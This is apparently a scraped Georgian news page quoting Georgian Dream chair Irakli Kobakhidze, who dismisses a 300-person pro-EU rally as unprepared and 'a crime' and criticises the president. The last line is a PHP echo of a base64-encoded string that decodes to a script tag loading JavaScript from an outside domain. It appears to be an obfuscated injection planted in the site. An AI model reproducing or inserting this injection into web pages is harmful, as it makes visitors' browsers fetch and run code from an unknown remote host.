celsiusi
ავერსი შნაიდერი
300-კაციანი აქცია არის სრულად აცდენილი იმ რეალობას, რაც საქართველოშია, – ამის შესახებ პარტია „ქართული ოცნების“ თავმჯდომარემ, ირაკლი კობახიძემ საქართველოს პირველი არხის გადაცემაში „დღის თემა“ სტუმრობისას განაცხადა.
 
„ჩვენ რაც ვთქვით, ის გამართლდა, აქცია აბსოლუტურად მოუმზადებელი იყო. ევროკავშირში ინტეგრაციას საქართველოში მხარს უჭერს მოსახლეობის 85 პროცენტი და დღეს აქციაზე მისული იყო 300 ადამიანი, საიდანაც 200-ზე მეტი იყო პრეზიდენტი, ელჩები, ჟურნალისტები და ადმინისტრაციის თანამშრომლები, პლუს პოლიციელები. როდესაც ასეთი მოუმზადებელი ინიციატივით გამოდიხარ, მინიმუმ, ვიღაცას უნდა შეეკითხო. ელემენტარულად, ტექნიკური მხარეც რომ ავიღოთ, ვიღაცას ხომ უნდა გაეფრთხილებინა მერია იმასთან დაკავშირებით, რომ მაგალითად, უნდა შეზღუდულიყო მოძრაობა. ინიციატორის მხრიდან ასეთი გაფრთხილება თუ არ შედის, მერია ასეთ ზომას თვითონ ვერ მიიღებს, ხომ?! არც მოძრაობა იყო შეზღუდული და ხალხიც არ იყო მისული. რასაც ჩვენ ვამბობდით, რომ ეს ინიციატივა აბსოლუტურად მოუმზადებელი იყო და პირიქით, კონტრპროდუქციული იქნებოდა, ეს ახდა და ასეთ ინიციატივაში ჩვენ, ბუნებრივია, ვერ მივიღებდით მონაწილეობას. 300-კაციანი აქცია ეს არის სრულად აცდენილი იმ რეალობას, რაც საქართველოშია. როდესაც ევროინტეგრაციას მხარს უჭერს მოსახლეობის 85 პროცენტი და 300 კაცი გამოგყავს, ეს შეცდომაც არ არის. ეს არის დანაშაული, პირდაპირ ასე ვიტყოდი“, – განაცხადა კობახიძემ.
 
მისი თქმით, სამწუხაროდ, პრეზიდენტი არ უჯერებს ხოლმე მმართველ გუნდს და შემდეგ, ეს ყველაფერი მას თვითონ უბრუნდება ცუდად.
 
 
575
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");